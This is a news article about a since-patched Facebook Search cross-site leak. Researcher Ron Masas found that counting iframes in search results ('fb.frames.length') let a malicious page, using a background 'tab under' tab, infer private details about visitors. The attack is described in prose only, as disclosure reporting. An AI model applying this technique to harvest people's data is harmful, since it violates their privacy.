ZDNet | Security

Facebook patches another bug that could have allowed mass-harvesting of user data

Facebook engineers have plugged another bug in the social network’s underlying codebase that could have allowed a malicious threat actor to stealthily collect highly personal information about Facebook users.

More security news

In an email exchange with ZDNet, Imperva’s Ron Masas, the security researcher who discovered the issue, says the bug resided in Facebook’s Search system.

“I browsed Facebook’s online search results, and in their HTML noticed that each result contained an iframe element — probably used for Facebook’s own internal tracking,” Masas said.

The researcher says that upon seeing this, he realized that by looking for an iframe inside the search results page he could determine if a search query has returned a positive or negative result.

Using basic yes and no questions, Masas says he could infer if users have liked a particular page, if they’ve taken photos at certain geographical locations, if they had friends of a certain religion in their friends list, if they’ve shared posts with a specific text, if a user has friends with a particular name, if the user has friends living in a specific city or country, and many other highly sensitive details.

These search queries, even if they didn’t expose fine-grained details, they did expose second-hand information that could reveal, when pieced together, the identity of a user and his friends circle.

But access to some of this highly-personal information is only available to the user alone. An attacker wouldn’t be able to run these search queries via the public Facebook Search feature.

To go around this limitation, Masas created a malicious web page on which an attacker could lure users. If the user interacts with this page in any way, such as scrolling or clicking, the page automatically executes malicious JavaScript code that automates these search queries in a new tab.

Masas told ZDNet that an attacker could use a technique called “tab under” to force the opening of the Facebook Search page inside a background tab, which keeps the user’s focus on the main malicious page –which could be disguised as an online game, movie streaming portal, or news article.

Since the tab under technique is regularly used nowadays for pushing intrusive online ads, most users wouldn’t even pay attention to the new tab being opened in their browser’s background, considering just another ad.

While the user is interacting with the malicious page, Masas’ script would automate a series of Facebook searches via the Facebook Graph API, count the number of iframes the search results returned via the “fb.frames.length” property, and log the results. The researcher shared a video of the attack –while it was still possible.

The attack would surely not work if users have two-three tabs opened in their desktop browser and they see a new Facebook tab being opened, but since most users tend to keep a large number of tabs in the tab bar, there’s a high chance most users won’t even see the attack going on –especially if they’re focused on the attacker’s malicious page, which should be easy if the page delivers a game, news article, or video.

Further, the attack is also very likely to be even more efficient on mobile devices, where tabs aren’t visible on screen, but only as a tab counter, which is often ignored.

Masas told ZDNet that his attack worked against all browsers and was not limited to Chrome, like a previous Facebook bug he found in August.

Furthermore, the attack also doesn’t need to open individual tabs for each search query, allowing the attacker to reload the existing tab with a new search URL at short intervals.

In a blog post today, Masas says he reported the bug to Facebook in May this year, and the platform has rolled out fixes shortly after.

The researcher’s findings shows that despite its expansive bug bounty program, Facebook will always have a hard time securing such a huge platform, and will always remain open to mass-harvesting operations, such as the Cambridge Analytica scandal or the recent security breach caused by another platform feature —the View As button.

Related cyber-security coverage:

READ MORE HERE